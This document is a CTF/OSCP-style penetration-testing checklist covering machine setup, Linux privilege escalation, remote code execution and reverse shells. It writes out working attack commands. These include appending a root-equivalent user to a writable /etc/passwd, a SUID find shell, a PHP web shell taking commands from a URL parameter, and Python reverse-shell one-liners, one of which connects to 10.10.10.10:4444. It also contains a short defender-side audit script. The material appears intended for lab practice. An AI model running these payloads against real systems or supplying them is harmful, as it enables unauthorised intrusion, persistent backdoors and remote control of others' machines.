# checklist

## Preparation

<details>

<summary>Expand</summary>

* [ ] Find IP of the machine
  * [ ] `export IP=<MACHINE_IP>`
  * [ ] `export MACHINE_NAME=<MACHINE_NAME>`
* [ ] Set folder structure
  * [ ] `cd ctf/`
  * [ ] `mkdir -p $MACHINE_NAME/enum`
  * [ ] `mkdir -p $MACHINE_NAME/files`
  * [ ] `touch $MACHINE_NAME/enum/users.txt`
  * [ ] `cp templates/report.md $MACHINE_NAME/${MACHINE_NAME}.md` (paths are relative to `ctf/` after the `cd` above)
* [ ] Add the hostname to `/etc/hosts` (if it helps)

</details>

## Enumeration

<details>

<summary>Expand</summary>

</details>

## Privilege Escalation

<details>

<summary>Expand</summary>

* [ ] Privilege escalation
  * [ ] `sudo -l`
  * [ ] relative path exploitable?
    * [ ] Example: `sudo /sudo_permitted_location/../home/user/my_file`
  * [ ] password re-use
    * [ ] from credentials found during enumeration
    * [ ] `su - <user>`
      * [ ] ***Stabilize Shell $***
        * [ ] `which python` -> is Python available?
        * [ ] `python -c 'import pty; pty.spawn("/bin/bash")'` -> [interactive terminal spawned via python](https://github.com/demoninhead/nullbrain/blob/main/Explain/READEME.md)
        * [ ] `tty` quick test
        * [ ] `export TERM=xterm-256color` -> set the terminal type
        * [ ] `alias ll='clear ; ls -lsaht --color=auto'` -> define an `ll` alias
        * [ ] `stty raw -echo; fg; reset` -> background the shell with Ctrl-Z first, then run this for a stable shell
        * [ ] `stty columns 200 rows 200`
    * [ ] e.g: `sudo /usr/bin/mysql -e '\! /bin/sh'` [sudo nopass for mysql](https://gtfobins.github.io/gtfobins/mysql/#sudo)
  * [ ] `netstat -tupanl | grep -i '127.0.0.1'` -> anything listening on loopback only?
  * [ ] Netstat alternative `ss -tunlp`
  * [ ] `cat /etc/crontab`
  * [ ] `find / -perm -u=s -type f 2>/dev/null`
    * [ ] *The first step is to identify all programs or files that have SUID bits enabled*
      * [ ] example
        * [ ] /usr/bin/zsh
    * [ ] Read Source Code (if any)
    * [ ] look for files owned by root grouped by user.
    * [ ] `ps aux | grep -i 'root' --color=auto` <-- anything running as root?
      * [ ] lateral machines? (not done anything like this)
      * [ ] private ip address? (not done anything)
      * [ ] web root -> any DB creds?
  * [ ] Take advantage of this misconfiguration by abusing the PATH variable
  * [ ] Take advantage of misconfigured cronjob.
  * [ ] `find / -perm -g=s -type f 2>/dev/null` -> are there any SGID files?
  * [ ] `ps auxwf` -> process tree; check for anything writable, or:
  * [ ] `find / -type f -user root -perm /o=w 2>/dev/null | grep -v '^/proc/'` -> world-writable files owned by root
  * [ ] File transfer
    * [ ] [Python http.server](https://github.com/demoninhead/nullbrain/blob/main/tools/file-transfer/README.md#python-simple-http-server)
  * [ ] simple HTTP server
    * [ ] download pspy
    * [ ] Second shell -> `pspy<BIT>`
    * [ ] `getcap -r / 2>/dev/null` -> Are there any extended permissions
    * [ ] exploit misconfiguration
  * [ ] writable `/etc/passwd`?
    * [ ] `perl -le 'print crypt("PassWord","addedsalt")'`
    * [ ] `echo "nullBrain:saltedvaluefromabove:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd`
  * [ ] Privilege escalation Enum
    * [ ] <https://github.com/diego-treitos/linux-smart-enumeration> (is this allowed in OSCP?)
    * [ ] <https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS> (is this allowed in OSCP?)
  * [ ] kernel exploits?
    * [ ] <https://github.com/mzet-/linux-exploit-suggester>
    * [ ] e.g. Dirty Cow [example HowTo](https://github.com/demoninhead/nullbrain/blob/main/CTF/Checklists/practical/dirty_cow/README.md)
  * [ ] world-writable exploit
    * [ ] `echo "<?php system('chmod +s /usr/bin/find'); ?>" > /stuffed`
    * [ ] Using find related exploit
      * [ ] `find . -exec /bin/bash -p \; -quit`
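A defender-side check for the `/etc/passwd` tampering in the writable-`passwd` item above, added here as an example; it is not part of the original checklist. It assumes the file path is passed as an argument (defaulting to `/etc/passwd`), and any sample passwd lines used with it are constructed.

```sh
#!/bin/sh
# Added defender-side audit, not part of the original checklist.
# Flags the two conditions the "writable passwd" item above relies on:
#   1. any passwd entry other than "root" carrying UID 0 or GID 0
#      (what an appended "nullBrain:...:0:0:..." line leaves behind);
#   2. a passwd file that is writable by "other" (world-writable).
# The file path is an assumed argument; it defaults to /etc/passwd.

# Print "<user>:<uid>:<gid>" for every non-root entry with UID 0 or GID 0.
# Prints nothing on a clean system.
audit_passwd_uid0() {
  file="${1:-/etc/passwd}"
  awk -F: '$1 != "root" && ($3 == 0 || $4 == 0) { print $1 ":" $3 ":" $4 }' "$file"
}

# Exit status 0 when the file is world-writable, 1 otherwise.
# `find -perm -o=w` matches only if the other-write bit is set.
passwd_is_writable() {
  file="${1:-/etc/passwd}"
  [ -n "$(find "$file" -maxdepth 0 -perm -o=w 2>/dev/null)" ]
}

# Overall verdict: 0 = clean, 1 = something to investigate.
audit_passwd() {
  file="${1:-/etc/passwd}"
  status=0
  hits=$(audit_passwd_uid0 "$file")
  if [ -n "$hits" ]; then
    echo "extra UID/GID 0 accounts in $file:"
    echo "$hits"
    status=1
  fi
  if passwd_is_writable "$file"; then
    echo "$file is world-writable"
    status=1
  fi
  return "$status"
}

# Run against the live file only when asked, so sourcing this file is harmless.
if [ "${AUDIT_RUN:-0}" = "1" ]; then
  audit_passwd /etc/passwd
fi
```

Run with `AUDIT_RUN=1 sh audit_passwd.sh` on a host; a non-zero exit status means an extra UID 0 account or a world-writable passwd file was found.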

</details>

## Remote Code Execution (RCE)

<details>

<summary>Expand</summary>

* [ ] Remote Code Execution
  * [ ] `<?php system($_GET['cmd']);?>`
  * [ ] Verify RCE
    * [ ] e.g. `http://$IP/<path>/?lang=/var/ftp/pub/backdoor.php&cmd=id`
    * [ ] Payload:
      * [ ] <https://github.com/nullbr41n/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md>
      * [ ] payload converter (hURL)
        * [ ] `hURL -U 'export RHOST="$IP"; export RPORT="$PORT"; python -c xxxx'`
      * [ ] `python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'`
      * [ ] `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

</details>

## Reverse Shell

<details>

<summary>Expand</summary>

* [ ] Reverse Shell
  * [ ] web uploads
    * [ ] `nc -nlvp 1` -> `Listening on port 1`
    * [ ] Upload payload on other side, should open connection
    * [ ] check RCE section.
      * [ ] ***Stabilize Shell $***
        * [ ] `which python` -> is Python available?
        * [ ] `python -c 'import pty; pty.spawn("/bin/bash")'` (or `python3`) -> spawn a proper tty
        * [ ] `tty` quick test
        * [ ] `export TERM=xterm-256color` -> set the terminal type
        * [ ] `alias ll='clear ; ls -lsaht --color=auto'` -> define an `ll` alias
        * [ ] `stty raw -echo; fg; reset` -> background the shell with Ctrl-Z first, then run this for a stable shell
        * [ ] `stty columns 200 rows 200`

</details>
